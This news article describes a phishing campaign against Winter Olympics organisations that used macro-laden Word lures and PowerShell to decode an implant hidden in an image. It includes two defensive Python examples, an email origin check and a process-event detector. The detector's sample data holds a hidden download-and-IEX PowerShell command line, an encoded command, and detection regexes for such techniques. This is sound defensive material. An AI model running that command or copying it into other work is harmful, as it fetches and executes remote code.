In what comes as no surprise to cyber security practitioners, researchers have uncovered a stealthy campaign to compromise several organisations associated with the Winter Olympics, which South Korea hosts in February.
E-mails sent to organisations involved with the upcoming Winter Olympics contained malicious attachments masquerading as reports from the National Counter-Terrorism Center (NCTC) in South Korea.
The campaign was uncovered by researchers at McAfee, who first observed it on 22 December and saw repeated attempts over the following days. They did not attribute the operation to any particular group.
‘The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file, and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script. They also wrote custom PowerShell code to decode the hidden image and reveal the implant,’ said the researchers while describing the phishing campaign.
The phishing campaign began with the hackers sending e-mails directly to firstname.lastname@example.org and including a number of other South Korean organisations in the bcc field, thereby maximising the reach of their campaign.
At the same time, the sender was forged so that the e-mails appeared to come from the National Counter-Terrorism Center (NCTC) in South Korea, the agency responsible for conducting physical security checks, which made it far more likely that recipients would open the attachments.
While the e-mails initially appeared genuine, closer inspection of the message headers showed that they had been sent from an IP address in Singapore through a Postfix mail server. The attached Word documents used the familiar lure of a prompt asking the user to "enable content" in order to read the document; doing so enables the embedded macros.
Once macros are enabled, the obfuscated macro launches PowerShell, which downloads an image file from a remote server and decodes the implant hidden inside it. The implant then opens an encrypted channel to the attackers' server, over which they can execute commands on the victim's machine and install additional malware.
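The origin check described above (a forged NCTC sender, a real origin in Singapore on a Postfix server) is done by reading the Received chain. The script below is an added example, not McAfee's analysis or code from the original article: it parses a constructed message in which every address, host name and IP is invented, walks the Received headers from the earliest hop to the first routable client IP, records the MTA software that the sender's own server stamped into the header, and reports whether the host that handed the message over belongs to the domain the From: header claims.

```python
import email
import email.utils
import ipaddress
import re

# Constructed sample message: a lure claiming to come from a counter-terrorism
# body, submitted locally on a Postfix relay that then delivers to the target's
# MX. Every address, host name and IP here is invented for this example.
SAMPLE_EML = """\
Received: from relay.example.net (relay.example.net [203.0.113.45])
    by mx.recipient.example (Postfix) with ESMTPS id 7C1D2E
    for <recipient@recipient.example>; Fri, 22 Dec 2017 09:12:31 +0900
Received: from localhost (localhost [127.0.0.1])
    by relay.example.net (Postfix) with ESMTP id 4A9B8C;
    Fri, 22 Dec 2017 09:12:02 +0900
From: "NCTC" <report@counter-terrorism.example>
To: recipient@recipient.example
Subject: Counter-terrorism drill report
Content-Type: text/plain

Please see the attached report.
"""

# Address ranges that never identify the true sending host.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
FROM_RE = re.compile(r"\bfrom\s+([\w.\-]+)", re.I)
BY_RE = re.compile(r"\bby\s+(\S+)\s*\(([^)]*)\)", re.I)


def originating_hop(raw):
    """Walk the Received chain from the earliest hop and return the first hop
    with a routable client IP, together with the MTA software the sender's own
    server stamped into any earlier (internal) hop."""
    msg = email.message_from_string(raw)
    hops = [str(h) for h in msg.get_all("Received", [])]
    sender_mta = None
    for hop in reversed(hops):          # headers are prepended: last = earliest
        m = IP_RE.search(hop)
        if not m:
            continue
        ip = ipaddress.ip_address(m.group(1))
        if any(ip in net for net in INTERNAL):
            # Still inside the sender's infrastructure, so the "by" clause
            # names the sender's own MTA (e.g. "(Postfix)").
            by = BY_RE.search(hop)
            if by:
                sender_mta = by.group(2).split(",")[0].strip()
            continue
        helo = FROM_RE.search(hop)
        return {"ip": str(ip),
                "helo": helo.group(1) if helo else None,
                "sender_mta": sender_mta}
    return None


def from_domain_mismatch(raw):
    """True when the host that handed the message over is not in the domain
    the From: header claims. Weak evidence on its own (legitimate third-party
    relays trigger it too); SPF/DKIM/DMARC via DNS is the authoritative check."""
    msg = email.message_from_string(raw)
    _, addr = email.utils.parseaddr(msg.get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    hop = originating_hop(raw)
    if not domain or hop is None or not hop["helo"]:
        return None
    helo = hop["helo"].lower().rstrip(".")
    return not (helo == domain or helo.endswith("." + domain))


if __name__ == "__main__":
    print(originating_hop(SAMPLE_EML))
    print("From domain mismatch:", from_domain_mismatch(SAMPLE_EML))
```

Received headers are written by each receiving server, so only the hops added by servers you trust (your own MX and its upstreams) can be relied on; anything below those can be forged by the sender, which is why the origin IP found this way should be corroborated with SPF, DKIM and DMARC results rather than used alone.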
‘The attacker’s objective is to make analysis difficult and to evade detection technologies that rely on pattern matching. Because the obfuscation makes use of native functions in PowerShell, the script can run in an obfuscated state and work correctly,’ the researchers added.
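Pattern matching on the script text is exactly what the obfuscation above is built to defeat, so a defender would rather catch the chain the researchers describe at the process-creation layer: a Word process spawning PowerShell (or mshta for the earlier HTA variant), a hidden window, an execution-policy bypass, a download of an image, and native-function obfuscation such as IEX, [char] or string concatenation. The scorer below is an added example, not code from McAfee or the original article. It runs over constructed Sysmon-style process events whose paths, URLs and command lines are invented, and the indicator weights and threshold are assumptions chosen here, not values from the report.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1 style records. Every path, URL and command line
# is invented for this example.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -c $u='http://203.0.113.9/img/report.png';(New-Object Net.WebClient).DownloadFile($u,$env:TEMP+'\r.png');IEX($decoded)"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\Backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\user\AppData\Local\Temp\report.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoP -NonI -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkA"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "cmd.exe"}
OFFICE_SPAWN_WEIGHT = 4   # assumption: the parent/child pair alone is worth a look

# (indicator name, weight, case-insensitive regex over the command line).
# Weights are assumptions for this example, not values from the report.
CMDLINE_INDICATORS = [
    ("hidden_window", 1, r"-w(?:indowstyle)?\s+hidden"),
    ("exec_bypass",   1, r"-e(?:x|xec|xecutionpolicy|p)\s+bypass"),
    ("encoded_cmd",   2, r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}"),
    ("download",      2, r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer"),
    ("image_url",     1, r"https?://\S+\.(?:png|jpe?g|gif|bmp)\b"),   # image used as a carrier
    ("iex",           1, r"\biex\b|invoke-expression"),
    ("string_obfusc", 1, r"\[char\]|-join\b|frombase64string|'\s*\+\s*'|`[a-z]"),
]


def score_event(ev):
    """Return (score, [indicator names]) for one process-creation event."""
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    image = ntpath.basename(ev.get("Image", "")).lower()
    cmd = ev.get("CommandLine", "")
    score, hits = 0, []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
        score += OFFICE_SPAWN_WEIGHT
    if image in SCRIPT_HOSTS:
        for name, weight, pattern in CMDLINE_INDICATORS:
            if re.search(pattern, cmd, re.I):
                hits.append(name)
                score += weight
    return score, hits


def flag_events(events, threshold=4):
    """Return [(index, score, hits)] for events at or above the threshold."""
    flagged = []
    for i, ev in enumerate(events):
        score, hits = score_event(ev)
        if score >= threshold:
            flagged.append((i, score, hits))
    return flagged


if __name__ == "__main__":
    for i, score, hits in flag_events(EVENTS):
        print(f"event {i}: score {score}, indicators {hits}")
```

With the assumed weights, the Word-to-PowerShell download (event 0) and the Word-to-mshta launch (event 2) are flagged, a scheduled backup script is not, and a hidden encoded PowerShell started from explorer (event 3) sits just under the default threshold; lowering the threshold to 3 catches it, at the cost of more triage in environments where administrators use encoded commands. Because the command line is all this example sees, the decoded implant itself stays invisible; PowerShell script block logging would expose the script after the obfuscation has been undone, which is the complementary control.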
This isn’t the first time that hackers have targeted major sporting events or sports personalities. Last year, the infamous hacker group Fancy Bears hacked into World Anti-Doping Agency’s servers and released documents that contained details of hundreds of athletes who failed dope tests in 2015 and 2016.
In September, England's Football Association (FA) also issued an alert stating that Russian hackers were planning to target England footballers and other staff before and during the Football World Cup in Russia later this year.
‘Global gatherings such as the Olympics that see world leaders, businesses and governmental organisations converge on one location are a naturally attractive target for digital criminal activity. Notably, it is becoming increasingly likely that multiple attempts will be made to obtain sensitive information like passwords.
Even when the stakes are high in situations like this, the international community must ensure that the necessary measures are in place and sufficiently fortified to prevent any data from falling into the wrong hands,’ says Peter Carlisle, VP for EMEA at Thales eSecurity.